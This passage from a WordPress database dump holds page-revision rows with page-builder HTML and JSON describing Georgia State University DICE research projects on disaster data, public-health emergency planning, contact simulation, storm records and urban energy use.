           <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:37:07','2023-09-29 14:37:07','',126,'https://gsudice.dataconn.net/?p=1469',0,'revision','',0),(1475,1,'2023-09-29 10:38:17','2023-09-29 14:38:17','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado.jpg','cropped-cropped-tornado.jpg','','inherit','open','closed','','cropped-cropped-tornado-jpg','','','2023-09-29 10:38:17','2023-09-29 14:38:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-tornado.jpg',0,'attachment','image/jpeg',0),(1476,1,'2023-09-29 10:38:20','2023-09-29 14:38:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:38:20','2023-09-29 14:38:20','',438,'https://gsudice.dataconn.net/?p=1476',0,'revision','',0),(1477,1,'2023-09-29 10:38:20','2023-09-29 14:38:20','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" 